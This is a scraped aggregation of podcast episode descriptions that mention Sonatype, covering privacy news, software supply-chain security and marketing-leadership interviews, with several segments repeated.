Podcasts about sonatype

Show Notes - https://forum.closednetwork.io/t/episode-58-the-price-of-being-watched/198Website / Donations / Support - https://closednetwork.io/support/BTC Lightning Donations - closednetwork@getalby.com / simon@primal.netThank You Patreons & Direct Supporters! - https://www.patreon.com/closednetworkhttps://xmrchat.com/closednetworkDirect Support - https://closednetwork.ioSubscribe Without Patreon - https://closednetwork.io/#/portal/signupMichael Bates - Privacy Bad AssDavid - Privacy Bad AssTK - Privacy Bad AssTrying - Privacy Bad AssVO - Privacy Bad AssMrMilkMustache - Privacy SupporterHutch - Privacy AdvocateInferno_Potato Privacy SupporterDolores Y - Privacy SupporterDirect Support - Craig D Thank You Producers! You Produce This Show!TOP LIGHTNING BOOSTERS !!!! THANK YOU !!!@bon thousands and thousands and thousands of SATs sats!!@fireflygow - 5,000 sats!!frigolay - 34,540 SATs.. HOLY SHITEwardemoff - 5,000 SATsSilas ThornbrookThank You To Our Moderators:Unintelligentseven - Follow on NOSTR primal.net/p/npub15rp9gyw346fmcxgdlgp2y9a2xua9ujdk9nzumflshkwjsc7wepwqnh354dMaddestMax - Follow on NOSTR primal.net/p/npub133yzwsqfgvsuxd4clvkgupshzhjn52v837dlud6gjk4tu2c7grqq3sxavtJoin Our CommunityClosed Network Forum - https://forum.closednetwork.ioJoin Our Matrix Channels!Main - https://matrix.to/#/#closedntwrk:matrix.orgOff Topic - https://matrix.to/#/#closednetworkofftopic:matrix.orgSimpleX Group Chat - https://smp9.simplex.im/g#SRBJK7JhuMWa1jgxfmnOfHz7Bl5KjnKUFL5zy-Jn-j0Join Our Mastodon server!https://closednetwork.socialFollow Simon On The SocialsMastodon - https://closednetwork.social/@simonNOSTR - Public Address - npub186l3994gark0fhknh9zp27q38wv3uy042appcpx93cack5q2n03qte2lu2 - primal.net/simonTwitter / X - @ClosedNtwrkInstagram - https://www.instagram.com/closednetworkpodcast/YouTube - https://www.youtube.com/@closednetworkEmail - simon@closednetwork.ioSpecial Thanks to - EloquentWinter for creating - A Linux guide on MAC address randomizationhttps://forum.closednetwork.io/t/a-linux-guide-on-mac-address-randomization/189TOPICSEncourage curiosity - This week ties together a single thread: someone else holds your data, and therefore holds the power. From algorithmic pricing to supply-chain malware to government scanning to cloud-AI assistants — and the hopeful counter-move, taking your data back. The episode theme is curiosity: in every story, one extra question would have changed the outcome.Segment 1 — Surveillance PricingInspired by More Perfect Union, "We Found the Radical Solution to Surveillance Pricing"Surveillance pricing (a.k.a. personalized / surveillance-based pricing) = charging you an individual price based on sensitive data about you — purchase history, browsing, geolocation, social activity, even biometric and financial signals. The economic endgame is "perfect price discrimination": charging each person their exact maximum.DoorDash holds a patent describing promotions based on a user's stress level.Delta Air Lines (with AI firm Fetcherr) has talked about expanding generative-AI pricing to ~20% of domestic fares, with ambitions to go further. Senators (Gallego, Blumenthal, Warner) and House members demanded answers.A Groundwork Collaborative / Consumer Reports / More Perfect Union study found different shoppers charged different prices for identical Instacart items. Former FTC chair Lina Khan has voiced concern.The "radical" fix is a law: New York's proposed One Fair Price Act would ban surveillance pricing outright — one posted price for everyone.Defensive moves (partial): private/container browsing, block cookies, disable ad personalization, use a VPN, compare logged-out vs. logged-in prices. Honest caveat: this is a structural problem — regulation, not browser tricks, is the real fix.Curious question: Is this price the market — or is it me being read?Segment 2 — "Arch malware btw": the AUR supply-chain attackInspired by Michael Tunnell and Switched to Linux — developing story, June 2026.The Arch User Repository (AUR) is community-maintained, unvetted package build scripts (PKGBUILDs). In a ~24-hour window, a coordinated attack poisoned a large number of packages — reports cite 1,500+ touched, with community trackers confirming ~400–500 malicious package names and rising.How: Attackers adopted orphaned packages (abandoned by maintainers — anyone can claim them) and edited the PKGBUILD to add a pre/post-install hook that pulls a malicious npm package, atomic-lockfile (Sonatype tracked one strand as the "Atomic Arch" campaign).Payload: A Linux infostealer + optional root-only eBPF rootkit. Targets developer secrets — browser creds/cookies, SSH keys, GitHub creds, Vault/npm tokens, Docker/Podman, VPN configs, shell history, Slack/Teams/Discord/Telegram, crypto wallets. eBPF lets it run in-kernel and hide processes/files/connections.If you were hit and the rootkit deployed: rotate every credential (from a clean machine) and reinstall from scratch. A normal uninstall is not enough.Status: Maintainers are removing malicious commits and banning accounts; the official repos of Arch-based distros (CachyOS, Garuda, Chaotic-AUR) were not infected — only users who installed/upgraded a compromised AUR package during the window. Community checker script + affected-package list were published within hours.Action checklist (Arch users):pacman -Qm → list your foreign (AUR) packages.Compare against the community list / run the checker script (CachyOS advisory).If matched → rotate credentials from a clean machine, then clean-reinstall.Curious habit: Before installing, ask who maintains this, when did it last legitimately update, and did ownership recently change? On the AUR, read the PKGBUILD — the malicious line was visible to anyone who looked.Segment 3 — UK Device Scanning: 90 Days to ComplyInspired by "Signal's Warning: The UK's Phone Scanning Plan Just Got Real"The UK government signaled that phone makers (Apple, Google) will get ~90 days to start scanning photos on young people's devices for nude images. Running alongside: Online Safety Act powers for Ofcom aimed at encrypted messaging (key report expected ~April). The mechanism: client-side scanning — every message/image checked on your device, before encryption.Why it matters: Client-side scanning doesn't break encryption directly — it inspects content before the lock clicks shut. The "end-to-end encrypted" label survives, but the privacy guarantee (nobody is looking) is gone.Signal's position: scanning won't protect children and builds surveillance infrastructure that "endangers us all."Security: once scanning exists on every device, the match-database can be expanded — swap it and you're scanning for slogans, documents, faces. Signal would withdraw from the UK rather than build a backdoor. Mullvad raised parallel alarms.Misdiagnosis: real child safety = better-funded education, social services, AI-platform guardrails — not default scanning. Rallying phrase: "Surveillance is not safety."Bigger picture: This is a template (cf. the EU's "Chat Control"). Sympathetic justification + a mechanism that, once built, can point anywhere.Curious question: Not is the goal good? (it usually is) but what else can this machine do once built, and who decides what it points at next?Segment 4 — iOS 27 at WWDC: the Privacy Fine PrintApple WWDC 2026 keynote coverage.Genuine wins: New Siri AI (next-gen Apple Intelligence) uses a tiered architecture — simple requests on-device, moderate ones via Private Cloud Compute (inspectable, hardened). Plus stronger family safety: child-account setup, parental controls, redesigned Screen Time, new Safari safeguards.The fine print (two concerns):Total context access. Siri AI indexes across your messages, emails, photos, and apps — a unified, queryable view of your whole digital life. Conversation history syncs via iCloud ("with privacy protections"), but strength depends on whether you've enabled Advanced Data Protection (Apple's E2EE for iCloud — not on by default).New Google dependency. Apple made official a Gemini partnership — the heaviest reasoning routes to Google Cloud. Apple says queries are anonymized and tokenized so neither Apple nor Google can link them to you (Federighi: "privacy in AI is non-negotiable"). Critics counter that PCC/anonymization is "only as private as the weakest link" — if Google retains any path to usage data for training/debugging, the guarantee weakens.Takeaway: Apple's defaults are still among the best of the mainstream — but don't let "privacy" in a keynote switch off your curiosity. On update: review Siri AI indexing settings, turn on Advanced Data Protection, and understand where your hardest queries travel.Curious question: A magical assistant that knows everything about you is, by definition, a system granted everything about you. Did you make that trade on purpose?Segment 5 — Self-Hosting 101: What to Migrate FirstOriginal recurring segment — Part 1 (scope). Part 2 next week: hands-on photos build.Self-hosting = run the services yourself, on hardware you own, instead of renting space on a company's servers. It's the deliberate counter-move to every other story this week. Honest caveat: you become your own IT department (backups, updates, downtime). Don't eat the elephant at once — scope first.The five candidates (ranked by impact-to-effort):Photos — highest emotional and surveillance value (faces, locations, timestamps). Self-host with Immich (Google-Photos-like: app, auto camera-roll backup, face/object search). Difficulty: moderate; biggest single win.Calendar — a forward-looking map of your life. CalDAV via Radicale or Nextcloud; syncs to your existing calendar app. Easy–moderate; great first project.Contacts — your social graph (everyone else's data too). CardDAV on the same Radicale/Nextcloud server — bundle it with calendar. Easy.File backups — documents and digital paperwork. Often Nextcloud.

#349 | Megan Lueders (CMO, Sonatype), Ido Mart (CMO, ManyChat), and Kim Storin (CMO, Zayo) join Dave for a live CMO panel from an Exit Five meetup in Austin. Megan breaks down how the pace of change in marketing has outrun every other function in the business. Ido talks about why your strengths as a CMO only matter if you choose the right environment for them. And Kim shares how she measures marketing impact in a company with long, complex sales cycles and drops a line worth writing down: marketing is never green when the business is red. They also get into pipeline attribution, founder-led content, LinkedIn influencers, and what most CMOs get wrong about aligning with their CEO on what marketing actually is.Timestamps(00:00) - - Intros: Megan Lueders (Sonatype), Ido Mart (ManyChat), Kim Storin (Zayo) (05:33) - - What they wish they'd known when they became CMO (10:32) - - How marketing has changed more than any other function (13:07) - - How to measure marketing impact in long, complex sales cycles (14:37) - - Growth at all costs vs. efficiency: how they're navigating it (21:55) - - How to talk to your CFO about marketing spend (25:28) - - What's not working anymore: email, granular data, paid media (32:52) - - What is working: sales enablement, influencers, product marketing (36:50) - - Why B2B is actually more emotional than consumer buying (40:39) - - Audience Q&A: defending channels that work but don't have clean attribution (42:30) - - Acquisition vs. retention: where are you actually spending time (46:29) - - Founder-led content and executive presence on social (49:58) - - LinkedIn influencers: is the spend worth it (52:49) - - Sales enablement and how to make messaging stick internally Join 50,0000 people who get Dave's Newsletter here: https://www.exitfive.com/newsletterLearn more about Exit Five's private marketing community: https://www.exitfive.com/***Brought to you by:Knak - A no-code, campaign creation platform that lets you go from idea to on-brand email and landing pages in minutes, using AI where it actually matters. Learn more at knak.com/exitfive, or check out the MCP server by clicking this link. Vector - A contact-level ads platform that lets you build audiences from actual people on your site, clicking your ads, and checking out your competitors. Learn more at vector.co, and get on the waitlist for their new MCP server by clicking here. Compound Growth Marketing - A full-funnel demand generation agency that helps high-growth cybersecurity, DevOps, and enterprise software companies drive more pipeline through AI SEO, paid media, and go-to-market engineering. Visit compoundgrowthmarketing.com and tell them Dave sent you.***Thanks to my friends at hatch.fm for producing this episode and handling all of the Exit Five podcast production.They give you unlimited podcast editing and strategy for your B2B podcast.Get unlimited podcast editing and on-demand strategy for one low monthly cost. Just upload your episode, and they take care of the rest.Visit hatch.fm to learn more

Red team exercises set goals to see if a particular outcome can be accomplished through a simulated attack, but the ultimate outcome should be educating the org about how to improve tools and processes that make attacks more difficult to succeed. Gwyddon "Data" Owen shares his experience building a red team, creating an exercise, and leveraging the results to improve security. And while the adoption of LLMs will accelerate a red team's activities, there are still plenty of foundational security controls that orgs can establish that would require a red team to be more than just fast, but fast and very careful. Coding Agents Are Getting More Cautious, But Not Safer A new study finds that while frontier AI coding models are hallucinating less than they did a year ago, they still preserve a significant amount of avoidable software risk when left ungrounded. Sonatype's research shows that connecting these models to real-time software intelligence dramatically improves remediation quality and reduces critical and high-severity vulnerability exposure by 60–70%. The takeaway is clear: safer AI-assisted development will depend not just on better models, but on grounding them in accurate, current dependency and vulnerability data. This segment is sponsored by Sonatype. Read the study: https://securityweekly.com/sonatypersac How We Achieve Agentic Outcomes in CyberSecurity: The “Do-It-For-Me” Mobile Defense If you look at deepfakes, synthetic identity, social engineering, and new malware variants coming to market, it seems like attackers have a first-mover advantage in using AI. The volume and variety of threats are growing faster than the current cyber stack can address. Against this backdrop, organizations are moving away from “do-it-yourself” delivery models (more tools, more alerts, more headcount) to “do-it-for-me” agentic AI delivery models (using platforms that unify data, execute policy, and automate outcomes). The emphasis outside of cyber is on empowering the expert human-in-the-loop — so teams spend less time in the noise and more time delivering business outcomes. This segment explores how cybersecurity leaders can make the most of the AI Age, leveraging it for good while staying relevant amid the explosive AI adoption curve. This segment is sponsored by Appdome. Visit https://securityweekly.com/appdomersac to learn more about them! Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw-379

Red team exercises set goals to see if a particular outcome can be accomplished through a simulated attack, but the ultimate outcome should be educating the org about how to improve tools and processes that make attacks more difficult to succeed. Gwyddon "Data" Owen shares his experience building a red team, creating an exercise, and leveraging the results to improve security. And while the adoption of LLMs will accelerate a red team's activities, there are still plenty of foundational security controls that orgs can establish that would require a red team to be more than just fast, but fast and very careful. Coding Agents Are Getting More Cautious, But Not Safer A new study finds that while frontier AI coding models are hallucinating less than they did a year ago, they still preserve a significant amount of avoidable software risk when left ungrounded. Sonatype's research shows that connecting these models to real-time software intelligence dramatically improves remediation quality and reduces critical and high-severity vulnerability exposure by 60–70%. The takeaway is clear: safer AI-assisted development will depend not just on better models, but on grounding them in accurate, current dependency and vulnerability data. This segment is sponsored by Sonatype. Read the study: https://securityweekly.com/sonatypersac How We Achieve Agentic Outcomes in CyberSecurity: The "Do-It-For-Me" Mobile Defense If you look at deepfakes, synthetic identity, social engineering, and new malware variants coming to market, it seems like attackers have a first-mover advantage in using AI. The volume and variety of threats are growing faster than the current cyber stack can address. Against this backdrop, organizations are moving away from "do-it-yourself" delivery models (more tools, more alerts, more headcount) to "do-it-for-me" agentic AI delivery models (using platforms that unify data, execute policy, and automate outcomes). The emphasis outside of cyber is on empowering the expert human-in-the-loop — so teams spend less time in the noise and more time delivering business outcomes. This segment explores how cybersecurity leaders can make the most of the AI Age, leveraging it for good while staying relevant amid the explosive AI adoption curve. This segment is sponsored by Appdome. Visit https://securityweekly.com/appdomersac to learn more about them! Show Notes: https://securityweekly.com/asw-379

Red team exercises set goals to see if a particular outcome can be accomplished through a simulated attack, but the ultimate outcome should be educating the org about how to improve tools and processes that make attacks more difficult to succeed. Gwyddon "Data" Owen shares his experience building a red team, creating an exercise, and leveraging the results to improve security. And while the adoption of LLMs will accelerate a red team's activities, there are still plenty of foundational security controls that orgs can establish that would require a red team to be more than just fast, but fast and very careful. Coding Agents Are Getting More Cautious, But Not Safer A new study finds that while frontier AI coding models are hallucinating less than they did a year ago, they still preserve a significant amount of avoidable software risk when left ungrounded. Sonatype's research shows that connecting these models to real-time software intelligence dramatically improves remediation quality and reduces critical and high-severity vulnerability exposure by 60–70%. The takeaway is clear: safer AI-assisted development will depend not just on better models, but on grounding them in accurate, current dependency and vulnerability data. This segment is sponsored by Sonatype. Read the study: https://securityweekly.com/sonatypersac How We Achieve Agentic Outcomes in CyberSecurity: The "Do-It-For-Me" Mobile Defense If you look at deepfakes, synthetic identity, social engineering, and new malware variants coming to market, it seems like attackers have a first-mover advantage in using AI. The volume and variety of threats are growing faster than the current cyber stack can address. Against this backdrop, organizations are moving away from "do-it-yourself" delivery models (more tools, more alerts, more headcount) to "do-it-for-me" agentic AI delivery models (using platforms that unify data, execute policy, and automate outcomes). The emphasis outside of cyber is on empowering the expert human-in-the-loop — so teams spend less time in the noise and more time delivering business outcomes. This segment explores how cybersecurity leaders can make the most of the AI Age, leveraging it for good while staying relevant amid the explosive AI adoption curve. This segment is sponsored by Appdome. Visit https://securityweekly.com/appdomersac to learn more about them! Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw-379

Red team exercises set goals to see if a particular outcome can be accomplished through a simulated attack, but the ultimate outcome should be educating the org about how to improve tools and processes that make attacks more difficult to succeed. Gwyddon "Data" Owen shares his experience building a red team, creating an exercise, and leveraging the results to improve security. And while the adoption of LLMs will accelerate a red team's activities, there are still plenty of foundational security controls that orgs can establish that would require a red team to be more than just fast, but fast and very careful. Coding Agents Are Getting More Cautious, But Not Safer A new study finds that while frontier AI coding models are hallucinating less than they did a year ago, they still preserve a significant amount of avoidable software risk when left ungrounded. Sonatype's research shows that connecting these models to real-time software intelligence dramatically improves remediation quality and reduces critical and high-severity vulnerability exposure by 60–70%. The takeaway is clear: safer AI-assisted development will depend not just on better models, but on grounding them in accurate, current dependency and vulnerability data. This segment is sponsored by Sonatype. Read the study: https://securityweekly.com/sonatypersac How We Achieve Agentic Outcomes in CyberSecurity: The "Do-It-For-Me" Mobile Defense If you look at deepfakes, synthetic identity, social engineering, and new malware variants coming to market, it seems like attackers have a first-mover advantage in using AI. The volume and variety of threats are growing faster than the current cyber stack can address. Against this backdrop, organizations are moving away from "do-it-yourself" delivery models (more tools, more alerts, more headcount) to "do-it-for-me" agentic AI delivery models (using platforms that unify data, execute policy, and automate outcomes). The emphasis outside of cyber is on empowering the expert human-in-the-loop — so teams spend less time in the noise and more time delivering business outcomes. This segment explores how cybersecurity leaders can make the most of the AI Age, leveraging it for good while staying relevant amid the explosive AI adoption curve. This segment is sponsored by Appdome. Visit https://securityweekly.com/appdomersac to learn more about them! Show Notes: https://securityweekly.com/asw-379

Compromised DVRs and Finding Them in the Wild https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Compromised%20DVRs%20and%20Finding%20Them%20in%20the%20Wild/32886 Cisco ISE RCE Vulnerability and WebEx Auth Bypass CVE-2026-20184 CVE-2026-20180 CVE-2026-20186 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-4fverepv https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-cui-cert-8jSZYhWL Windows Defender 0-Day (RedSun) https://github.com/Nightmare-Eclipse/RedSun Sonatype Vulnerability CVE-2026-5189 https://support.sonatype.com/hc/en-us/articles/50817138825491-CVE-2026-5189-Nexus-Repository-3-Hardcoded-Credential-in-Internal-Database-Component-2026-04-15

Josh chats with Brian Fox from Sonatype about their 2026 State of the Software Supply Chain report. Most of the number continue to grow at alarming rates, but there's some new interesting findings in this one. We discuss end of life and open source which is tough to define. We touch on what using AI with open source dependencies looks like (and why it's broken), and we discuss the challenge of upgrading your open source dependencies in a way that doesn't break everything. It's a great report and great discussion. The show notes and blog post for this episode can be found at https://opensourcesecurity.io/2026/2026-03-SOTSSC-Brian-Fox/

Sara Chevrette, Head of Global Talent Acquisition at Sonatype, joins James Mackey, to unpack the connection between psychology and recruiting talent. She shares how values drive hiring, pushing for curiosity, and the importance of building a strong culture within the workplace.  Thank you to our sponsor, SecureVision, for making this show possible! Follow us:https://www.linkedin.com/company/82436841/SecureVision: #1 Rated Embedded Recruitment Firm on G2!https://www.g2.com/products/securevision/reviewsThanks for listening!

In this episode, Dave interviews Mitchell Johnson, chief product development officer at Sonatype, about the notion of a Hippocratic Oath for developers, where you do no harm to the codebase, and how AI is impacting that.They discuss:The responsibility a developer has to keeping their codebase healthy whenever they add a new featureHow being able to output code faster with AI makes it harder to have visibility into how changes impact downstream systemsHow AI assisted coding may actually slow things down

Organizations pour millions into protecting running applications—yet attackers are targeting the delivery path itself.This episode of AppSec Contradictions reveals why CI/CD and cloud pipelines are becoming the new frontline in cybersecurity.

Organizations pour millions into protecting running applications—yet attackers are targeting the delivery path itself.This episode of AppSec Contradictions reveals why CI/CD and cloud pipelines are becoming the new frontline in cybersecurity.

Derek Weeks is the Chief Marketing Officer at Katalon, a company that provides an AI-augmented software quality management platform for automating testing and improving software development workflows. He brings over 30 years of marketing experience, including leadership roles at Sonatype and the Linux Foundation. Derek co-founded All Day DevOps and has pioneered efforts in open-source software supply chain security. He is also the author of Unfair Mindshare: A CMO's Guide to Community-Led Marketing in a Product-Led World.  In this episode… Building a loyal audience is harder than ever in the crowded B2B SaaS landscape. Traditional marketing tactics can struggle to break through, and customer acquisition costs continue to rise. How can companies create authentic connections that lead to long-term growth? According to Derek Weeks, a seasoned marketing leader and pioneer in community-led strategies, the answer is to put audience needs first and consistently provide value before selling anything. He highlights that trust is earned by creating spaces where people can learn, share, and engage without feeling pitched. By leveraging user-generated content and empowering practitioners to create authentic conversations, he has seen communities grow to hundreds of thousands of members. In this episode of the Revenue Engine Podcast, host Alex Gluz sits down with Derek Weeks, Chief Marketing Officer at Katalon, to discuss how community-led marketing drives sustainable B2B SaaS growth. They explore strategies to scale a product community from 60,000 to 117,000 members, why user-generated content lowers acquisition costs, and how to adapt content for the age of LLM search. Derek also shares lessons from building the All Day DevOps community and keeping audiences engaged over time.

Tyler Warden, SVP of Product at Sonatype, shares surprising research on security, productivity and prioritization, with actionable strategies for organizational transformation. Topics Include:Tyler from Sonatype (Maven creators) shares research on security culture in developmentSecurity is more cultural than tooling, with rising supply chain attacksDevelopment speeds up while global regulations rapidly change across marketsTyler's background: wanted to be a Broadway conductor, not tech speakerBeethoven's 9th Symphony story: nephew missed a dot, changing tempo foreverWe can "be the dot" - small changes creating big organizational impactThree organization types: Leaders (collaborative), Adapters (balanced), Protectors (security-first)Leaders achieve best productivity and security but face executive skepticismResearch reveals balanced teams outperform purely security-focused or productivity-focused approachesHigh-performance teams go faster AND stay more secure than alternatives"Yes" philosophy from improv comedy: fun happens when we enable innovationApply proven supply chain principles from manufacturing to software development security Participants:Tyler Warden – Senior Vice President, Product, SonatypeFurther Links:Sonatype: Website | LinkedIn | AWS MarketplaceSee how Amazon Web Services gives you the freedom to migrate, innovate, and scale your software company at https://aws.amazon.com/isv/

This week we talk about Proton's new 2fa app, a new kernel that has been released and of course your feedback. -- During The Show -- 00:54 Intro Kids carry plague 02:15 Networking - Fred OpenWRT on Ubiquity Gear If it's not local, You don't own it OpenWrt One (https://openwrt.org/toh/openwrt/one?s[]=openwrt) 05:53 Video Calls - Mike Nextcloud Home Assistant Voice Preview (https://www.home-assistant.io/voice-pe/) Sip Trip Phone (https://apps.nextcloud.com/apps/sip_trip_phone) 12:29 Networking - Charlie UniFi Blog Post (https://blog.ui.com/article/introducing-unifi-os-server) How Noah thinks it through Steve's approach Closed source is a place holder This is a good thing 17:45 Continuing Cisco Conversation - Michael Podcast (https://pca.st/episode/82676b1b-49b5-4155-b462-8b9d81ff6197) Juniper JCNIA Repo (https://github.com/rikosintie/JNCIA) Juniper DevOps Repo (https://github.com/rikosintie/Juniper-DevOps) DevNet Associate Certification (https://github.com/rikosintie/DevNetAssoc) CookBooks (https://github.com/rikosintie/CookBook) Cisco EEM (https://github.com/rikosintie/Cisco-EEM) 20:15 News Wire Shotbut 245.07 - shotcut.org (https://shotcut.org/blog/new-release-250726) Linux 6.16 - kernelnewbies.org (https://kernelnewbies.org/Linux_6.16) GNU Linux-Libre 6.16 - lwn.net (https://lwn.net/Articles/1031540) Fractal 5 Pro - hackaday.com (https://hackaday.com/2025/08/04/open-source-5-axis-printer-has-its-own-slicer) Sonatype's Findings - sonatype.com (https://www.sonatype.com/blog/sonatype-uncovers-global-espionage-campaign-in-open-source-ecosystems) Plague Backdoor - thehackernews.com (https://thehackernews.com/2025/08/new-plague-pam-backdoor-exposes.html) UNC2891 Bank Heist - group-ib.com (https://www.group-ib.com/blog/unc2891-bank-heist) Auto-Color Backdoor - thehackernews.com (https://thehackernews.com/2025/07/hackers-exploit-sap-vulnerability-to.html) Recent Fedora Outage - fedoraproject.org (https://discussion.fedoraproject.org/t/for-your-information-ddos-affecting-most-of-the-fedoraproject-org-services/161568/4) Open AI Models - openai.com (https://openai.com/index/introducing-gpt-oss) Meta Won't Open Source "superintelligence" AI Models - techcrunch (https://techcrunch.com/2025/07/30/zuckerberg-says-meta-likely-wont-open-source-all-of-its-superintelligence-ai-models) pcmag.com (https://www.pcmag.com/news/zuckerberg-walks-back-open-source-ai-pledge-citing-safety-risk) Cogito v2 - artificialintelligence-news.com (https://www.artificialintelligence-news.com/news/deep-cogito-v2-open-source-ai-hones-its-reasoning-skills) Agntcy Framework - forbes.com (https://www.forbes.com/sites/moorinsights/2025/07/29/the-agntcy-framework-for-agentic-ai-moves-to-the-linux-foundation) 22:29 Steve and Self Hosted AI Started with AI to learn Asked AI to make show notes Using AI to look for past gift recommendations Download script Beautiful Soup (https://en.wikipedia.org/wiki/Beautiful_Soup_(HTML_parser)) Notebook LM Whisper UI/Fast Whisper Ethical AI issues AI makes people lazy Making content "for AI" 44:15 Linux Kernel 6.16 BTRFS Bug LUP 626 (https://linuxunplugged.com/626) Intel Trusted Domain Extensions 9 to 5 Linux (https://9to5linux.com/linux-kernel-6-16-officially-released-this-is-whats-new) 46:46 Proton Authenticator App linuxiac.com (https://linuxiac.com/proton-launches-free-open-source-authenticator-app/) Proton Authenticator App is open source Encrypted sync No Ads or Tracking Direct import/export Push notifications Ente Auth (https://ente.io/auth/) -- The Extra Credit Section -- For links to the articles and material referenced in this week's episode check out this week's page from our podcast dashboard! This Episode's Podcast Dashboard (http://podcast.asknoahshow.com/454) Phone Systems for Ask Noah provided by Voxtelesys (http://www.voxtelesys.com/asknoah) Join us in our dedicated chatroom #GeekLab:linuxdelta.com on Matrix (https://element.linuxdelta.com/#/room/#geeklab:linuxdelta.com) -- Stay In Touch -- Find all the resources for this show on the Ask Noah Dashboard Ask Noah Dashboard (http://www.asknoahshow.com) Need more help than a radio show can offer? Altispeed provides commercial IT services and they're excited to offer you a great deal for listening to the Ask Noah Show. Call today and ask about the discount for listeners of the Ask Noah Show! Altispeed Technologies (http://www.altispeed.com/) Contact Noah live [at] asknoahshow.com -- Twitter -- Noah - Kernellinux (https://twitter.com/kernellinux) Ask Noah Show (https://twitter.com/asknoahshow) Altispeed Technologies (https://twitter.com/altispeed)

Chief Product Development Officer Mitchell Johnson discusses how Sonatype protects enterprise developers from malicious open source components while keeping them productive through AI.Topics Include:Sonatype provides software supply chain solutions for enterprises using open source componentsThey serve large enterprises, government agencies, and critical infrastructure providers globallyMain challenge: keeping developers productive while maintaining secure software supply chainsCybercrime and supply chain attacks are massive, growing industries threatening developersAI adoption is happening faster than expected, profoundly changing development workflowsBad actors evolved from waiting for vulnerabilities to creating malicious componentsMalicious open source components specifically target developer and DevOps toolchainsSonatype's security research team uses AI/ML to analyze every open source componentThey can predict and block malicious components before entering customer environmentsAWS partnership helps Sonatype meet customers where they want to do businessPartnership focuses on go-to-market alignment, not just technical integrationAWS sales teams should be treated as extensions of your own sales organizationUnderstanding AWS sales structure and incentives is crucial for successful partnershipsAI development is following same pattern as open source adoption twenty years ago"Shadow AI" parallels the earlier "shadow IT" trend with open source softwareAI speeds up code generation but security review processes haven't kept paceDevelopers need a "Hippocratic Oath" - taking responsibility for AI-generated code outputWithin 24 months, professionals not skilled in AI will struggle to stay relevantSonatype's culture encourages curiosity, experimentation, and accepts failure as part of innovationTheir core mission: help developers focus on innovation, not security choresParticipants:Mitchell Johnson – Chief Product Development Officer, SonatypeFurther Links:Sonatype WebsiteSonatype on AWS MarketplaceSee how Amazon Web Services gives you the freedom to migrate, innovate, and scale your software company at https://aws.amazon.com/isv/

ArmorCode unveils Anya—the first agentic AI virtual security champion designed specifically for AppSec and product security teams. Anya brings together conversation and context to help AppSec, developers and security teams cut through the noise, prioritize risks, and make faster, smarter decisions across code, cloud, and infrastructure. Built into the ArmorCode ASPM Platform and backed by 25B findings, 285+ integrations, natural language intelligence, and role-aware insights, Anya turns complexity into clarity, helping teams scale securely and close the security skills gap. Anya is now generally available and included as part of the ArmorCode ASPM Platform. Visit https://securityweekly.com/armorcodersac to request a demo! As 'vibe coding", the practice of using AI tools with specialized coding LLMs to develop software, is making waves, what are the implications for security teams? How can this new way of developing applications be made secure? Or have the horses already left the stable? Segment Resources: https://www.backslash.security/press-releases/backslash-security-reveals-in-new-research-that-gpt-4-1-other-popular-llms-generate-insecure-code-unless-explicitly-prompted https://www.backslash.security/blog/vibe-securing-4-1-pillars-of-appsec-for-vibe-coding This segment is sponsored by Backslash. Visit https://securityweekly.com/backslashrsac to learn more about them! The rise of AI has largely mirrored the early days of open source software. With rapid adoption amongst developers who are trying to do more with less time, unmanaged open source AI presents serious risks to organizations. Brian Fox, CTO & Co-founder of Sonatype, will dive into the risks associated with open source AI and best practices to secure it. Segment Resources: https://www.sonatype.com/solutions/open-source-ai https://www.sonatype.com/blog/beyond-open-vs.-closed-understanding-the-spectrum-of-ai-transparency https://www.sonatype.com/resources/whitepapers/modern-development-in-ai-era This segment is sponsored by Sonatype. Visit https://securityweekly.com/sonatypersac to learn more about Sonatype's AI SCA solutions! The surge in AI agents is creating a vast new cyber attack surface with Non-Human Identities (NHIs) becoming a prime target. This segment will explore how SandboxAQ's AQtive Guard Discover platform addresses this challenge by providing real-time vulnerability detection and mitigation for NHIs and cryptographic assets. We'll discuss the platform's AI-driven approach to inventory, threat detection, and automated remediation, and its crucial role in helping enterprises secure their AI-driven future. To take control of your NHI security and proactively address the escalating threats posed by AI agents, visit https://securityweekly.com/sandboxaqrsac to schedule an early deployment and risk assessment. Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw-332

ArmorCode unveils Anya—the first agentic AI virtual security champion designed specifically for AppSec and product security teams. Anya brings together conversation and context to help AppSec, developers and security teams cut through the noise, prioritize risks, and make faster, smarter decisions across code, cloud, and infrastructure. Built into the ArmorCode ASPM Platform and backed by 25B findings, 285+ integrations, natural language intelligence, and role-aware insights, Anya turns complexity into clarity, helping teams scale securely and close the security skills gap. Anya is now generally available and included as part of the ArmorCode ASPM Platform. Visit https://securityweekly.com/armorcodersac to request a demo! As 'vibe coding", the practice of using AI tools with specialized coding LLMs to develop software, is making waves, what are the implications for security teams? How can this new way of developing applications be made secure? Or have the horses already left the stable? Segment Resources: https://www.backslash.security/press-releases/backslash-security-reveals-in-new-research-that-gpt-4-1-other-popular-llms-generate-insecure-code-unless-explicitly-prompted https://www.backslash.security/blog/vibe-securing-4-1-pillars-of-appsec-for-vibe-coding This segment is sponsored by Backslash. Visit https://securityweekly.com/backslashrsac to learn more about them! The rise of AI has largely mirrored the early days of open source software. With rapid adoption amongst developers who are trying to do more with less time, unmanaged open source AI presents serious risks to organizations. Brian Fox, CTO & Co-founder of Sonatype, will dive into the risks associated with open source AI and best practices to secure it. Segment Resources: https://www.sonatype.com/solutions/open-source-ai https://www.sonatype.com/blog/beyond-open-vs.-closed-understanding-the-spectrum-of-ai-transparency https://www.sonatype.com/resources/whitepapers/modern-development-in-ai-era This segment is sponsored by Sonatype. Visit https://securityweekly.com/sonatypersac to learn more about Sonatype's AI SCA solutions! The surge in AI agents is creating a vast new cyber attack surface with Non-Human Identities (NHIs) becoming a prime target. This segment will explore how SandboxAQ's AQtive Guard Discover platform addresses this challenge by providing real-time vulnerability detection and mitigation for NHIs and cryptographic assets. We'll discuss the platform's AI-driven approach to inventory, threat detection, and automated remediation, and its crucial role in helping enterprises secure their AI-driven future. To take control of your NHI security and proactively address the escalating threats posed by AI agents, visit https://securityweekly.com/sandboxaqrsac to schedule an early deployment and risk assessment. Show Notes: https://securityweekly.com/asw-332

